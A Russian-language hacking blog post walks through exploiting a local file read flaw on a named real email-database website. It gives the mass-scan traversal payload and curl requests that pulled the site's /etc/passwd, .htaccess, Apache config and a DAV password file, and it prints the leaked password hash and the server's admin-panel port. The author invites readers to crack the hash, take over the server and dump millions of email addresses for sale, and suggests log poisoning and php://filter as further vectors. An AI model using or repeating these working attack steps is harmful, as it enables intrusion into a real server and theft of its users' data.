LFI LFR Безопасность Взлом

Взлом через LFR (чтение локальных файлов. На примере downloademail.info.

ВНИМАНИЕ! АДМИНИСТРАЦИЯ САЙТА НЕ СОВЕРШАЕТ И НЕ РЕКОМЕНДУЕТ ВАМ СОВЕРШАТЬ ПРОТИВОПРАВНЫХ ДЕЙСТВИЙ ИЛИ ПОЛУЧАТЬ...

Взлом через LFR (чтение локальных файлов. На примере downloademail.info.
Это изображение имеет пустой атрибут alt; его имя файла - izobrazhenie-338-1.png

ВНИМАНИЕ! АДМИНИСТРАЦИЯ САЙТА НЕ СОВЕРШАЕТ И НЕ РЕКОМЕНДУЕТ ВАМ СОВЕРШАТЬ ПРОТИВОПРАВНЫХ ДЕЙСТВИЙ ИЛИ ПОЛУЧАТЬ НЕСАНКЦИОНИРОВАННЫЙ ДОСТУП К СИСТЕМАМ. ДАННАЯ СТАТЬЯ НАПРАВЛЕНА НА ТО, ЧТОБЫ УКАЗАТЬ НА ПРОБЛЕМЫ С СИСТЕМАМИ И ПРЕДОСТЕРЕЧЬ ПОЛЬЗОВАТЕЛЕЙ ОТ ВОЗМОЖНЫХ АТАК.

LFR или LFI уязвимости, это тип уязвимости при неправильной настройке интерпретатора (например PHP), позволяющие прочитат локальные файлы.

LFI (inclusion, включение) или LFR (read, чтение) – возможность использования и/или выполнения локальных файлов на серверной стороне. Атакующий с помощью специально сформированного запроса может получить доступ к произвольным файлам на сервере, в том числе содержащую конфиденциальную информацию.

Проще говоря, это уязвимость открытия файлов с сервера + недостаточная фильтрация, что позволяет открывать произвольный файл. Разбираемся?

Интересно. Как много сайтов содержат уязвимость LFR(Чтение локальных файлов) ? Я решил это немедленно проверить. Тем более что инструмент есть, осталось только зарядить патронами.

Ингредиенты для заряда:

– Список сайтов

– Запрос, который мы будем применять к каждому сайту dl.php?f=../../../../../../../etc/passwd

– Признак гуда (слово): root:x:0

– Пыж, порох, капсуль. Поехали…

Пошли томительные часы ожидания (скан шел по всему миру, примерно 250 млн доменов). И тут радости моей небыло предела, в логах мелькнуло знакомое имя домена: downloademail.info

Быстро пробиваю Алексу – 350к. Ну что же, посмотрим что мы можем получить с этой баги на этом сайте.

Проверяем passwd:

http://www.email-database.info/dl.php?f=../../../../../../../etc/passwd

Есть. Софт не лохонулся и гуд на самом деле есть гуд. Интересно, что внутри dl.php? Сайт упорно не отдает содержимое. Срабатывает или правило .htaccess, или фаервол или хз что. Может быть рубит Cloudflare? *Как оказалось не Cloudflare. Потом я вытащил его IP в конфигах сервера.

http://www.email-database.info/dl.php?f=dl.php

http://www.email-database.info/dl.php?f=../dl.php

http://www.email-database.info/dl.php?f=../../dl.php

http://www.email-database.info/dl.php?f=../../../dl.php

Хм… Но ведь .htaccess я загрузить могу, в чем же дело???

curl http://www.email-database.info/dl.php?f=../../.htaccess
RewriteEngine on

RewriteBase /

 

<Limit GET POST>

order allow,deny

 

deny from 27.0.12.0/22

deny from 60.173.25.161

allow from all

</Limit>

 

 

ErrorDocument 404 http://email-database.info

RewriteCond %{HTTP_HOST} ^email-database.info

RewriteRule ^(.*)$ http://www.email-database.info/$1 [R=permanent,L]

RewriteRule ^d([0-9]*)-(.*).html$ index.php?page=chi-tiet&id_doc=$1 [L]

RewriteRule ^p([0-9]*)s([0-9]*)-(.*).html$ index.php?page=danh-muc&id_cat=$1&id_sub=$2 [L]

RewriteRule ^p([0-9]*)-(.*).html$ index.php?page=danh-muc&id_cat=$1 [L]

RewriteRule ^(.*).html$ index.php [L]

RewriteRule ^(.*)/(.*).html$ index.php [L]

RewriteRule ^(.*)/(.*)/(.*).html$ index.php [L]

RewriteRule ^(.*)/(.*)/(.*)/(.*).html$ index.php [L]

Ладно. Поищем конфиг веб сервера. Может быть нужно указывать путь к файлам от корня сайта. Да заодно интересно глянуть в логи доступа веб сервера и логи ошибок.

curl https://www.downloademail.info/dl.php?f=../../../../../../../../../../../etc/httpd/conf/httpd.conf
#

# This is the main Apache HTTP server configuration file. It contains the

# configuration directives that give the server its instructions.

# See <URL:http://httpd.apache.org/docs/2.4/> for detailed information.

# In particular, see

# <URL:http://httpd.apache.org/docs/2.4/mod/directives.html>

# for a discussion of each configuration directive.

#

# Do NOT simply read the instructions in here without understanding

# what they do. They're here only as hints or reminders. If you are unsure

# consult the online docs. You have been warned.

#

# Configuration and logfile names: If the filenames you specify for many

# of the server's control files begin with "/" (or "drive:/" for Win32), the

# server will use that explicit path. If the filenames do *not* begin

# with "/", the value of ServerRoot is prepended -- so 'log/access_log'

# with ServerRoot set to '/www' will be interpreted by the

# server as '/www/log/access_log', where as '/log/access_log' will be

# interpreted as '/log/access_log'.

 

#

# ServerRoot: The top of the directory tree under which the server's

# configuration, error, and log files are kept.

#

# Do not add a slash at the end of the directory path. If you point

# ServerRoot at a non-local disk, be sure to specify a local disk on the

# Mutex directive, if file-based mutexes are used. If you wish to share the

# same ServerRoot for multiple httpd daemons, you will need to change at

# least PidFile.

#

ServerRoot "/etc/httpd"

 

#

# Listen: Allows you to bind Apache to specific IP addresses and/or

# ports, instead of the default. See also the <VirtualHost>

# directive.

#

# Change this to Listen on specific IP addresses as shown below to

# prevent Apache from glomming onto all bound IP addresses.

#

#Listen 12.34.56.78:80

Listen 80

 

#

# Dynamic Shared Object (DSO) Support

#

# To be able to use the functionality of a module which was built as a DSO you

# have to place corresponding `LoadModule' lines at this location so the

# directives contained in it are actually available _before_ they are used.

# Statically compiled modules (those listed by `httpd -l') do not need

# to be loaded here.

#

# Example:

# LoadModule foo_module modules/mod_foo.so

#

Include conf.modules.d/*.conf

 

#

# If you wish httpd to run as a different user or group, you must run

# httpd as root initially and it will switch.

#

# User/Group: The name (or #number) of the user/group to run httpd as.

# It is usually good practice to create a dedicated user and group for

# running httpd, as with most system services.

#

User apache

Group apache

 

# 'Main' server configuration

#

# The directives in this section set up the values used by the 'main'

# server, which responds to any requests that aren't handled by a

# <VirtualHost> definition. These values also provide defaults for

# any <VirtualHost> containers you may define later in the file.

#

# All of these directives may appear inside <VirtualHost> containers,

# in which case these default settings will be overridden for the

# virtual host being defined.

#

 

#

# ServerAdmin: Your address, where problems with the server should be

# e-mailed. This address appears on some server-generated pages, such

# as error documents. e.g. admin@your-domain.com

#

ServerAdmin root@localhost

 

#

# ServerName gives the name and port that the server uses to identify itself.

# This can often be determined automatically, but we recommend you specify

# it explicitly to prevent problems during startup.

#

# If your host doesn't have a registered DNS name, enter its IP address here.

#

#ServerName www.example.com:80

 

#

# Deny access to the entirety of your server's filesystem. You must

# explicitly permit access to web content directories in other

# <Directory> blocks below.

#

<Directory />

AllowOverride none

Require all denied

</Directory>

 

#

# Note that from this point forward you must specifically allow

# particular features to be enabled - so if something's not working as

# you might expect, make sure that you have specifically enabled it

# below.

#

 

#

# DocumentRoot: The directory out of which you will serve your

# documents. By default, all requests are taken from this directory, but

# symbolic links and aliases may be used to point to other locations.

#

DocumentRoot "/var/www/html"

 

#

# Relax access to content within /var/www.

#

<Directory "/var/www">

AllowOverride None

# Allow open access:

Require all granted

</Directory>

 

# Further relax access to the default document root:

<Directory "/var/www/html">

#

# Possible values for the Options directive are "None", "All",

# or any combination of:

# Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews

#

# Note that "MultiViews" must be named *explicitly* --- "Options All"

# doesn't give it to you.

#

# The Options directive is both complicated and important. Please see

# http://httpd.apache.org/docs/2.4/mod/core.html#options

# for more information.

#

Options Indexes FollowSymLinks

 

#

# AllowOverride controls what directives may be placed in .htaccess files.

# It can be "All", "None", or any combination of the keywords:

# Options FileInfo AuthConfig Limit

#

AllowOverride None

 

#

# Controls who can get stuff from this server.

#

Require all granted

</Directory>

 

#

# DirectoryIndex: sets the file that Apache will serve if a directory

# is requested.

#

<IfModule dir_module>

DirectoryIndex index.html

</IfModule>

 

#

# The following lines prevent .htaccess and .htpasswd files from being

# viewed by Web clients.

#

<Files ".ht*">

Require all denied

</Files>

 

#

# ErrorLog: The location of the error log file.

# If you do not specify an ErrorLog directive within a <VirtualHost>

# container, error messages relating to that virtual host will be

# logged here. If you *do* define an error logfile for a <VirtualHost>

# container, that host's errors will be logged there and not here.

#

ErrorLog "logs/error_log"

 

#

# LogLevel: Control the number of messages logged to the error_log.

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

#

LogLevel warn

 

<IfModule log_config_module>

#

# The following directives define some format nicknames for use with

# a CustomLog directive (see below).

#

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined

LogFormat "%h %l %u %t \"%r\" %>s %b" common

 

<IfModule logio_module>

# You need to enable mod_logio.c to use %I and %O

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio

</IfModule>

 

#

# The location and format of the access logfile (Common Logfile Format).

# If you do not define any access logfiles within a <VirtualHost>

# container, they will be logged here. Contrariwise, if you *do*

# define per-<VirtualHost> access logfiles, transactions will be

# logged therein and *not* in this file.

#

#CustomLog "logs/access_log" common

 

#

# If you prefer a logfile with access, agent, and referer information

# (Combined Logfile Format) you can use the following directive.

#

CustomLog "logs/access_log" combined

</IfModule>

 

<IfModule alias_module>

#

# Redirect: Allows you to tell clients about documents that used to

# exist in your server's namespace, but do not anymore. The client

# will make a new request for the document at its new location.

# Example:

# Redirect permanent /foo http://www.example.com/bar

 

#

# Alias: Maps web paths into filesystem paths and is used to

# access content that does not live under the DocumentRoot.

# Example:

# Alias /webpath /full/filesystem/path

#

# If you include a trailing / on /webpath then the server will

# require it to be present in the URL. You will also likely

# need to provide a <Directory> section to allow access to

# the filesystem path.

 

#

# ScriptAlias: This controls which directories contain server scripts.

# ScriptAliases are essentially the same as Aliases, except that

# documents in the target directory are treated as applications and

# run by the server when requested rather than as documents sent to the

# client. The same rules about trailing "/" apply to ScriptAlias

# directives as to Alias.

#

ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"

 

</IfModule>

 

#

# "/var/www/cgi-bin" should be changed to whatever your ScriptAliased

# CGI directory exists, if you have that configured.

#

<Directory "/var/www/cgi-bin">

AllowOverride None

Options None

Require all granted

</Directory>

 

<IfModule mime_module>

#

# TypesConfig points to the file containing the list of mappings from

# filename extension to MIME-type.

#

TypesConfig /etc/mime.types

 

#

# AddType allows you to add to or override the MIME configuration

# file specified in TypesConfig for specific file types.

#

#AddType application/x-gzip .tgz

#

# AddEncoding allows you to have certain browsers uncompress

# information on the fly. Note: Not all browsers support this.

#

#AddEncoding x-compress .Z

#AddEncoding x-gzip .gz .tgz

#

# If the AddEncoding directives above are commented-out, then you

# probably should define those extensions to indicate media types:

#

AddType application/x-compress .Z

AddType application/x-gzip .gz .tgz

 

#

# AddHandler allows you to map certain file extensions to "handlers":

# actions unrelated to filetype. These can be either built into the server

# or added with the Action directive (see below)

#

# To use CGI scripts outside of ScriptAliased directories:

# (You will also need to add "ExecCGI" to the "Options" directive.)

#

#AddHandler cgi-script .cgi

 

# For type maps (negotiated resources):

#AddHandler type-map var

 

#

# Filters allow you to process content before it is sent to the client.

#

# To parse .shtml files for server-side includes (SSI):

# (You will also need to add "Includes" to the "Options" directive.)

#

AddType text/html .shtml

AddOutputFilter INCLUDES .shtml

</IfModule>

 

#

# Specify a default charset for all content served; this enables

# interpretation of all content as UTF-8 by default. To use the

# default browser choice (ISO-8859-1), or to allow the META tags

# in HTML content to override this choice, comment out this

# directive:

#

AddDefaultCharset UTF-8

 

<IfModule mime_magic_module>

#

# The mod_mime_magic module allows the server to use various hints from the

# contents of the file itself to determine its type. The MIMEMagicFile

# directive tells the module where the hint definitions are located.

#

MIMEMagicFile conf/magic

</IfModule>

 

#

# Customizable error responses come in three flavors:

# 1) plain text 2) local redirects 3) external redirects

#

# Some examples:

#ErrorDocument 500 "The server made a boo boo."

#ErrorDocument 404 /missing.html

#ErrorDocument 404 "/cgi-bin/missing_handler.pl"

#ErrorDocument 402 http://www.example.com/subscription_info.html

#

 

#

# EnableMMAP and EnableSendfile: On systems that support it,

# memory-mapping or the sendfile syscall may be used to deliver

# files. This usually improves server performance, but must

# be turned off when serving from networked-mounted

# filesystems or if support for these functions is otherwise

# broken on your system.

# Defaults if commented: EnableMMAP On, EnableSendfile Off

#

#EnableMMAP off

EnableSendfile on

 

# Supplemental configuration

#

# Load config files in the "/etc/httpd/conf.d" directory, if any.

IncludeOptional conf.d/*.conf

SSLProtocol ALL -SSLv2 -SSLv3

SSLCipherSuite HIGH:!SSLv2:!ADH:!aNULL:!eNULL:!NULL

ServerTokens Minimal

ServerSignature Off

TraceEnable Off

<VirtualHost 144.202.107.190:80>

SuexecUserGroup "#1000" "#1000"

ServerName downloademail.info

ServerAlias www.downloademail.info

ServerAlias mail.downloademail.info

ServerAlias webmail.downloademail.info

ServerAlias admin.downloademail.info

DocumentRoot /home/downloademail/public_html

ErrorLog /var/log/virtualmin/downloademail.info_error_log

CustomLog /var/log/virtualmin/downloademail.info_access_log combined

ScriptAlias /cgi-bin/ /home/downloademail/cgi-bin/

ScriptAlias /awstats/ /home/downloademail/cgi-bin/

DirectoryIndex index.html index.htm index.php index.php4 index.php5

<Directory /home/downloademail/public_html>

Options -Indexes +IncludesNOEXEC +SymLinksIfOwnerMatch +ExecCGI

allow from all

AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch

Require all granted

AddType application/x-httpd-php .php

AddHandler fcgid-script .php

AddHandler fcgid-script .php5

AddHandler fcgid-script .php7.0

FCGIWrapper /home/downloademail/fcgi-bin/php5.fcgi .php

FCGIWrapper /home/downloademail/fcgi-bin/php5.fcgi .php5

FCGIWrapper /home/downloademail/fcgi-bin/php7.0.fcgi .php7.0

</Directory>

<Directory /home/downloademail/cgi-bin>

allow from all

AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch

Require all granted

</Directory>

RewriteEngine on

RewriteCond %{HTTP_HOST} =webmail.downloademail.info

RewriteRule ^(.*) https://downloademail.info:20000/ [R]

RewriteCond %{HTTP_HOST} =admin.downloademail.info

RewriteRule ^(.*) https://downloademail.info:10000/ [R]

RemoveHandler .php

RemoveHandler .php5

RemoveHandler .php7.0

php_admin_value engine Off

FcgidMaxRequestLen 1073741824

<Files awstats.pl>

AuthName "downloademail.info statistics"

AuthType Basic

AuthUserFile /home/downloademail/.awstats-htpasswd

require valid-user

</Files>

Alias /dav /home/downloademail/public_html

<Location /dav>

DAV on

AuthType Basic

AuthName "downloademail.info"

AuthUserFile /home/downloademail/etc/dav.digest.passwd

Require valid-user

ForceType text/plain

Satisfy All

RemoveHandler .php

RemoveHandler .php5

RemoveHandler .php7.0

RewriteEngine off

</Location>

IPCCommTimeout 31

</VirtualHost>

Есть.

/var/log/virtualmin/downloademail.info_error_log

/var/log/virtualmin/downloademail.info_access_log

В логах на первый взгляд ничего интересного. Можно подрочить на количество трафика, идущего к этому сайту 🙂

Смотрим дальше. А что это за авторизация?

AuthUserFile /home/downloademail/etc/dav.digest.passwd

curl https://www.downloademail.info/dl.php?f=../../../../../../../../../../../home/downloademail/etc/dav.digest.passwd
downloademail:$1$48145609$Crljt8eUyNLO0X/Wmo/xq/

Блин… У меня как раз хешкет сломался. Интересно, а куда мы можем попробовать вбить пасс после расшифровки? Смотрим конфиг, и находим там правило, которое что-то делает при обращении к порту 20000

https://www.email-database.info:20000/

Вот она, админка Usermin. Если мы туда войдем – сервер наш.

Вишенка на торте (Расшифровка хеша и дальнейшее продвижение вглубь сервера) достается тебе, читатель. А также милионы email адресов, которые ты оттуда сдампишь, а потом обработаешь, или поставишь на аукцион. Или же может быть найдешь другой способ заливки. Могу дать несколько подсказок:

– У меня есть подозрение, что скрипт не читает файл и выводит его, а делает Include. Нужо попробовать записать в лог ошибок веб сервера php код, и попробовать его выполнить через этот инклуд. Но я этого не делал

– Можно попробовать прочитать php файлы(и вытащить с них конфиг базы данных) через php потоковые фильтры php://filter/read/=anyfilter/resource=/etc/passwd

– Можно… Да можно еще проверить кучу векторов и таки добить его. Но у меня уже закончилась мотивация. В следующей статье рассмотрим еще что-то интересное…

Как мы видим эксплуатация LFI и LFR уязвимостей совсем не сложна.

Очень злой админ
Очень злой админ Автор статьи

Админ сайта. Публикует интересные статьи с других ресурсов, либо их переводы. Если есть настроение, бывает, что пишет и что-то своё.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *